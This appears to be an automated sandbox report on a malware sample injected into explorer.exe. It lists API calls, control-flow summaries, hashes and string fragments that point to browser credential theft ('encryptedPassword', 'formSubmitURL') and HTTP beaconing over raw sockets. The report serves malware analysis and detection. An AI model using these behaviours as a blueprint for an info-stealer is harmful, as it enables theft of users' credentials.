                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05CB7294
                                                                                                                                                  • RTL: Resource at %p, xrefs: 05CB72A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                  • Opcode ID: 191fbcbdc0de5aff0952a04c67d1b05833fbb7fa2cb026c8dc602b8f57fa9af4
                                                                                                                                                  • Instruction ID: cfce4a80fe0811f7ee9b435c0897c399eae187706e15643efc51353c21d247af
                                                                                                                                                  • Opcode Fuzzy Hash: 191fbcbdc0de5aff0952a04c67d1b05833fbb7fa2cb026c8dc602b8f57fa9af4
                                                                                                                                                  • Instruction Fuzzy Hash: 3A410E31704206ABDB21DE25CC45FAAB7E6FB84714F100E19FC56EB640EB71E9429BD1
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: 84f179dbedce39d7cb995ca0f916d665220bbc7d23fccce59bed2b79382e7eca
                                                                                                                                                  • Instruction ID: 14de9712588053820c69362c099f39224915c9616e92243934158729e68ea656
                                                                                                                                                  • Opcode Fuzzy Hash: 84f179dbedce39d7cb995ca0f916d665220bbc7d23fccce59bed2b79382e7eca
                                                                                                                                                  • Instruction Fuzzy Hash: 82318476A006199FCB60DE29CC45BFEB7BCFB44610F441956E949E3200EB30EA489BA0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction ID: 084743b3132342efce170bc6c0e45763de96e3f4e998c2815e99448046bbfcf4
                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction Fuzzy Hash: E191A374E042159FDB24EE6AC880ABEB7E6FF44328F644D1AE855E72C0F7369A41C710
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                  • Opcode ID: 0baaf538499f937bacd323599ae26ef35655c87c3564a0d64ea206a5ce790119
                                                                                                                                                  • Instruction ID: cca7968400af03e358b9d34403b385aa6af9dd2e34972317ab74a414f70ef570
                                                                                                                                                  • Opcode Fuzzy Hash: 0baaf538499f937bacd323599ae26ef35655c87c3564a0d64ea206a5ce790119
                                                                                                                                                  • Instruction Fuzzy Hash: 60812976D052799BDB21CB54CC49BEABBB4AB48714F0045EAA90AB7250D7309E84CFA4

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:1.2%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:11.4%
                                                                                                                                                  Total number of Nodes:79
                                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                                  execution_graph (rendered graph; edge list not reproduced, only the nodes naming an API or a called routine are kept): e7e52dd -> e7e531a -> SleepEx (e7e5328), e7eff12 (7 API calls), NtCreateFile (e7e6432), e7e50f2 (6 API calls); e7f1bac -> e7f1bb1 -> e7e7b72 -> CreateMutexExW (e7e7cb5), then NtProtectVirtualMemory (e7efab2) and ObtainUserAgentString (e7e8de2, e7e8ee2, e7e8fc2, e7e9102, e7e92f2, e7e9712, all but the first also calling NtProtectVirtualMemory), ending in e7e5412 -> CreateThread (e7e544d); e7eb8c2 -> e7eb934 -> ObtainUserAgentString (e7eb995); e7f0232 -> e7f025c -> NtCreateFile (e7f0410); e7f1e12 -> e7f0942 -> NtProtectVirtualMemory (e7f1e45); e7f0f82 -> e7f0fb8 -> socket (e7ed5b2 / e7ed60a), getaddrinfo (e7f1117), connect (e7ed732 / e7ed788), send (e7ed6b2 / e7ed705), setsockopt and recv (e7f17f4).

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph for function e7f0f82 (rendered graph; basic-block edge list not reproduced): API blocks getaddrinfo (e7f1117-e7f1132) and setsockopt / recv (e7f17f4-e7f1861); internal calls to e7ed5b2, e7f0942, e7ed552, e7ed732, e7f1d62, e7ee482, e7ede72, e7f2002, e7f1d92, e7f2262, e7ee042, e7ed6b2, e7ed382 and e7ed7b2; exit blocks e7f18e6, e7f18ee, e7f18f6 and e7f18fe-e7f190c.
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: getaddrinforecvsetsockopt
                                                                                                                                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                  • API String ID: 1564272048-1117930895
                                                                                                                                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                  • Instruction ID: fc7e1f8fdd0e29b4f0fa322eb5603dbfd3219c90fd991843ae76058d7de25c88
                                                                                                                                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                  • Instruction Fuzzy Hash: E352A231614A48CFCB29EF68D4947EAB7E1FB54300F904A2EC59FC7266DE30A945CB45

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph for function e7f0232 (rendered graph; basic-block edge list not reproduced): API block NtCreateFile (e7f0410-e7f0458, followed by a call to e7f0172); internal calls to e7f0942 and e7f1e92; exit blocks e7f0378 / e7f037a-e7f03a0, e7f0894-e7f08a9, e7f08ae-e7f08b8 and e7f08bd-e7f08cd.
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: `
                                                                                                                                                  • API String ID: 823142352-2679148245
                                                                                                                                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                  • Instruction ID: 68eb87b0b4c1efc0bc4c2787d55760f6db4e93c615400438fd599dc8d00b71ea
                                                                                                                                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                  • Instruction Fuzzy Hash: 66222B70A28A09DFCB59DF28C4996AAF7E1FB98301F40462ED55ED3361DF30A851CB81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 443 e7f1e12-e7f1e6e call e7f0942 NtProtectVirtualMemory 446 e7f1e7d-e7f1e8f 443->446 447 e7f1e70-e7f1e7c 443->447
                                                                                                                                                  APIs
                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0E7F1E67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                  • Instruction ID: d62d6b8cdb9649a78c808fc1b95c1a81a2ba046d5837e3ef3acc728665c6f8d8
                                                                                                                                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                  • Instruction Fuzzy Hash: A401B134628B488F9B88EF6CD48422AB7E4FBCD315F000B3EE99AC3251EB70C9414742

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 448 e7f1e0a-e7f1e38 449 e7f1e45-e7f1e6e NtProtectVirtualMemory 448->449 450 e7f1e40 call e7f0942 448->450 451 e7f1e7d-e7f1e8f 449->451 452 e7f1e70-e7f1e7c 449->452 450->449
                                                                                                                                                  APIs
                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0E7F1E67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                  • Instruction ID: a8dd190a17bfef11053ac05b1636b8c8cae61bdd6cc53186dcbffb1bd5aab821
                                                                                                                                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                  • Instruction Fuzzy Hash: E801A734628B884B9744EF2C94552A6B3E5FBCE314F400B3EE59AC3251DB21D5014782

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0E7EB9A0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction ID: 004f295c4f60145deebd5c3a43490dea71641d8f5a5363d78dd8110998097e89
                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction Fuzzy Hash: CE31D131614A4D8FCB14EFA8C8887EDBBE0FB58204F40462AD54ED7361DF748A45C789

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0E7EB9A0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction ID: a64fed258c1380dcb3a03070e5449d284674ac7e388b6618c10d5dc025edba51
                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction Fuzzy Hash: 9921E131610A4CCECB14EFA8C8887EDBBE0FF58204F40462AD45AD7361DF748A04CB89

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 232 e7e7b66-e7e7b68 233 e7e7b6a-e7e7b71 232->233 234 e7e7b93-e7e7bb8 232->234 236 e7e7bbb-e7e7c22 call e7ee612 call e7f0942 * 2 233->236 237 e7e7b73-e7e7b92 233->237 234->236 244 e7e7cdc 236->244 245 e7e7c28-e7e7c2b 236->245 237->234 246 e7e7cde-e7e7cf6 244->246 245->244 247 e7e7c31-e7e7cb0 call e7f2da4 call e7f2022 call e7f23e2 call e7f2022 call e7f23e2 245->247 259 e7e7cb5-e7e7cca CreateMutexExW 247->259 260 e7e7cce-e7e7cd3 259->260 260->244 261 e7e7cd5-e7e7cda 260->261 261->246
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                  • Instruction ID: a4739ffbb3585d654e852a79893211270386a37fce0a3bc99eb17d3967984c7a
                                                                                                                                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                  • Instruction Fuzzy Hash: 61414D70918A08CFDB54EFA8C8D97AD77E0FB58300F44466AC94EDB366DE309945CB85

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                  • Instruction ID: 832404701bcfc9e7fd6b52f5e828013b00111f532d387cc9c3dd738628317517
                                                                                                                                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                  • Instruction Fuzzy Hash: 83415C70918A08CFDB94EFA8C8D97AD77E0FF68300F44456AC94EDB266DE309945CB85

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 289 e7ed72e-e7ed768 290 e7ed76a-e7ed782 call e7f0942 289->290 291 e7ed788-e7ed7ab connect 289->291 290->291
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: connect
                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                  • Instruction ID: 4026a15804bb888e4f42fee30dfaeeeb0c87acfac29be4aa630a658a77d8e672
                                                                                                                                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                  • Instruction Fuzzy Hash: 4C015A34618B188FCB94EF1CE088B55B7E0FB58324F1545AEE90DCB226CA74CC818BC2

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 294 e7ed732-e7ed768 295 e7ed76a-e7ed782 call e7f0942 294->295 296 e7ed788-e7ed7ab connect 294->296 295->296
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: connect
                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                  • Instruction ID: 4ade677a3f9090fd6e35fc5b0d06cd821a7506d0b7ae391006e029e9f118a8fc
                                                                                                                                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                  • Instruction Fuzzy Hash: 35012C70618A1C8FCB94EF5CE088B55B7E0FB59314F1545AEE90DCB226CA74CD818BC2

Control-flow Graph
[graph figure not reproduced; basic blocks e7ed6b2-e7ed72d, with a call to e7f0942 and a call to send]
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
Similarity
• API ID: send
• String ID: send
• API String ID: 2809346765-2809346765
• Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction ID: efc80d7e777b110dbdedbe7f7ad3dd9b8461bd67cc9608908d2473f47e0978e5
• Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction Fuzzy Hash: F9011270518A188FDB84EF1CD448B2577E0EB58314F1545AED95DCB366D670D8818B81

Control-flow Graph
[graph figure not reproduced; basic blocks e7ed5b2-e7ed62b, with a call to e7f0942 and a call to socket]
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727
• Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction ID: b93265869d1eb8877474a5cd39c3c6da0ce0becfc6a45f8f72ddb88d43655774
• Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction Fuzzy Hash: 2A0121706186188FCB84EF1CD048B54BBE0FB59354F1545ADD55ECB376D7B0C9818B86

Control-flow Graph
[graph figure not reproduced; basic blocks e7e52dd-e7e540e, containing a SleepEx loop and calls to e7f0942, e7eff12, e7e6432, e7e5e72 and e7e50f2]
APIs
Memory Dump Source
• Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction ID: e9dafdb2c661c4d420b6cafd19fc1ee89f2836310abe8a7cce5afc65e7a1ce9b
• Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction Fuzzy Hash: EA316B74614B0DDFDB64EF6980882A5F7A0FB58308F44467EC92DCB616CBB49860CF91

Control-flow Graph
[graph figure not reproduced; basic blocks e7e5412-e7e547d, with calls to e7f0942, e7f2c9e and CreateThread]
APIs
Memory Dump Source
• Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction ID: 736ba85738e628d4b26863de168ee4a1c493be7691008e123c927e48e50c0da0
• Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction Fuzzy Hash: 29F0C230268A484FD788EF2CD48562AB3D0EBA9215F444A3EE64DC3365DA29C9828716

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
• Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction ID: 5e2d46236654920c757fe4360ee4daca5d73d48a43cf69221f878ce2135dc5f7
• Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction Fuzzy Hash: A3E14974628F488FC764EF68D4947AAB7E0FB58300F504A2E95AFC7255DF30A941CB89

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
• Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction ID: 78a389c3b1d093493047b592cb66422e0ce690446f130c1087d53e3ff5931d89
• Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction Fuzzy Hash: 4EE13CB4618F488FCB64EF68D4947AAB7E0FB98300F504E2E969BC7255DF30A941CB45

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
• Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction ID: a26079c56d686cdcc7213e83138f565636f973a5d3304a011bbabf4146339774
• Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction Fuzzy Hash: BDE17971628B488FC764EF68C4947EAB7E1FB58301F404A2E95AFC7246DF34A541CB89

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
• Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction ID: 60fb4c3022ca451c89b3775732072d6515a1afce1eb5704fe081c827262188d1
• Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction Fuzzy Hash: 76B17C30528B488EDB59EF68D489AEEB7F1FF98300F50491ED49AC7251EF709905CB86

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
• Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction ID: db69825a1b7796bdd1344531f5db47edc8b349caa2753ed77b37cadd30af6090
• Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction Fuzzy Hash: 42B19A30618B488EDB54EF68D485AEEB7F1FF98300F50491ED59AC7251EF709909CB86

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
• Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction ID: bd5ae1d98399ef236484b4f830483a648b3a1c77897c9dd2e9472511d2f605fb
• Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction Fuzzy Hash: 98B18B31518B488EDB59EF68C485AEEB7F1FF98300F50491ED49AC7252EF74A409CB86

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
• API String ID: 0-1539916866
• Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction ID: c60bee3c3a1510a16f38034ac1d09a3e64be2573276e9cef1b12e8fb152a78a1
• Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction Fuzzy Hash: 2341B070A28B088FDB18DF88B4656AD7BF6FB48700F00025ED409E7355DBB5AD458BD6

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
• API String ID: 0-1539916866
• Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
